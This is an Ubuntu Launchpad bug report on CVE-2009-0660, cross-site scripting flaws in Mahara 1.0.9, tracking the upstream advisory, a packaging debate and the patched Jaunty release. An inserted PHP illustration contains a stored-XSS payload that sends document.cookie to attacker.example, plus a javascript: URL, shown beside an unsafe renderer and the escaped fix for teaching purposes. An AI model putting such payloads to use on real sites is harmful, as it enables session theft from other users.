CVE-2009-0660 Multiple XSS vulnerabilities in Mahara 1.0.9

Bug #340863 reported by François Marier
Affects            Status         Importance   Assigned to   Milestone
mahara (Ubuntu)    Fix Released   Undecided    Unassigned
  Intrepid         Invalid        Undecided    Unassigned
  Jaunty           Fix Released   Undecided    Unassigned

Bug Description

Binary package hint: mahara

The latest version of Mahara 1.0.x (1.0.10) fixes a number of XSS bugs in user profile data and blogs.

This is the official Mahara security advisory: http://mahara.org/interaction/forum/topic.php?id=350

The CVE issue itself doesn't appear to be public yet, but I have attached the patch I sent over to vendor-sec.

Given that Mahara 1.0.10 doesn't bring new features, only bug fixes, I would recommend that Ubuntu simply upgrade to that version for Jaunty. Otherwise I can prepare a patched 1.0.9-1+ubuntu1 package.
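The report above names only the bug class (cross-site scripting in user-supplied profile data and blog entries), not the affected code. What follows is an added illustration and is not code from the bug report, from Mahara, or from the CVE-2009-0660 patch: a profile field rendered unescaped beside the escaped form, plus the link case, where entity encoding alone does not stop a javascript: URL. The field names, the $profile array and the helper names are assumptions made for this example.

```php
<?php
// Added illustration of stored XSS in a profile field. Not Mahara's code
// and not the CVE-2009-0660 patch; $profile, the field names and the
// helper names are assumptions made for this example.
declare(strict_types=1);

// Constructed sample: values an attacker could save into their own profile.
$profile = [
    'introduction' => 'Hi! <script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'homepage'     => 'javascript:alert(document.domain)',
    'town'         => 'Welling"ton <b>',
];

// Vulnerable: the stored value is interpolated straight into the page, so
// the <script> element runs in the browser of everyone who views the profile.
function render_introduction_unsafe(string $intro): string
{
    return "<p class=\"intro\">$intro</p>";
}

// Fixed: escape for HTML context. ENT_QUOTES encodes both quote styles, so
// the same helper is safe in element content and in quoted attributes;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_introduction(string $intro): string
{
    return '<p class="intro">' . h($intro) . '</p>';
}

// Escaping is context-dependent: inside href, entity encoding does not
// neutralise a javascript: URL, so the scheme has to be checked as well.
function safe_link(string $url, string $label): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return h($label); // plain text, no link emitted
    }
    return '<a href="' . h($url) . '">' . h($label) . '</a>';
}

echo render_introduction_unsafe($profile['introduction']), "\n"; // script tag reaches the browser
echo render_introduction($profile['introduction']), "\n";        // &lt;script&gt;... is inert
echo '<p class="town">' . h($profile['town']) . "</p>\n";         // quote and tag are encoded
echo safe_link($profile['homepage'], 'Homepage'), "\n";          // javascript: URL is dropped
echo safe_link('https://example.org/~user', 'Homepage'), "\n";   // ordinary link is kept
```

Run it with `php example.php` and compare the first two lines of output: the unsafe renderer passes the `<script>` element through unchanged, the fixed one emits it as `&lt;script&gt;`. The point a reviewer of a patch like this checks is that every place a stored field reaches the page goes through the same escaping helper, and that URL-valued fields get the scheme check on top of it.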

François Marier (fmarier) wrote :
Changed in mahara:
status: New → Confirmed
Jamie Strandboge (jdstrand) wrote :

Thank you for using Ubuntu and taking the time to report a bug. Marking as public since upstream has a fix out. We are currently in FeatureFreeze so a patch to the existing package in Jaunty is needed.

Changed in mahara:
status: New → Confirmed
Jamie Strandboge (jdstrand) wrote :

Also, as this package is in universe and is community supported, perhaps you could prepare a debdiff for Intrepid to fix this by following https://wiki.ubuntu.com/SecurityUpdateProcedures. Thanks!

François Marier (fmarier) wrote :

I understand that there is a feature freeze, but is a freeze exception needed even if the new upstream version doesn't introduce new features?

Mahara 1.0.x is currently the old stable version and so it only gets bug fixes (see the release notes at http://mahara.org/interaction/forum/topic.php?id=351).

Upgrading the Jaunty version now would fix a few bugs and would make it easier to apply future fixes if needed.

Since Jaunty is not released yet, I assumed that we didn't have to follow the regular security procedure and that we could just update to the latest upstream point release.

Jamie Strandboge (jdstrand) wrote :

Since this package will require new packaging of the upstream source (as opposed to a simple sync request from Debian (sid and testing have 1.1 now)), it does require an FFE and the corresponding review. Once reviewed, it can be uploaded to Jaunty. See https://wiki.ubuntu.com/FreezeExceptionProcess for details.

As always, a patch/debdiff which follows https://wiki.ubuntu.com/SecurityUpdateProcedures is another option, and likely easier to get into Jaunty at this point in our release cycle.

François Marier (fmarier) wrote :

Here's a patched 1.0.9-2 package which I have built and tested.

It is based on the upstream 1.0 patch that was sent to vendor-sec.

Changed in mahara:
status: Confirmed → Fix Committed
François Marier (fmarier) wrote :

No point in fixing intrepid as that version of the package is completely unusable.

Changed in mahara:
status: Confirmed → Invalid
Jamie Strandboge (jdstrand) wrote :

If Intrepid is unusable, another bug should be filed against it detailing the problems, with the fixes (if you know them). A StableReleaseUpdate (SRU) could then be applied for that makes it usable again (and also fixes this security issue).

Changed in mahara:
status: Invalid → New
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mahara - 1.0.9-2ubuntu0.2

---------------
mahara (1.0.9-2ubuntu0.2) jaunty; urgency=low

  * Upload to correct pocket

mahara (1.0.9-2ubuntu0.1) jaunty-security; urgency=low

  * SECURITY UPDATE: multiple cross-site scripting vulnerabilities in user
    profile data and blogs (LP: #340863)
    - debian/patches/CVE-2009-0660.dpatch: fixes from upstream advisory
    - http://mahara.org/interaction/forum/topic.php?id=350
    - CVE-2009-0660
  * Add dpatch support

 -- Jamie Strandboge <email address hidden> Thu, 19 Mar 2009 10:04:50 -0500

Changed in mahara:
status: Fix Committed → Fix Released
Alex Valavanis (valavanisalex) wrote :

Intrepid Ibex reached end-of-life on 30 April 2010 so I am closing the report. The bug has been fixed in newer releases of Ubuntu.

Changed in mahara (Ubuntu Intrepid):
status: New → Invalid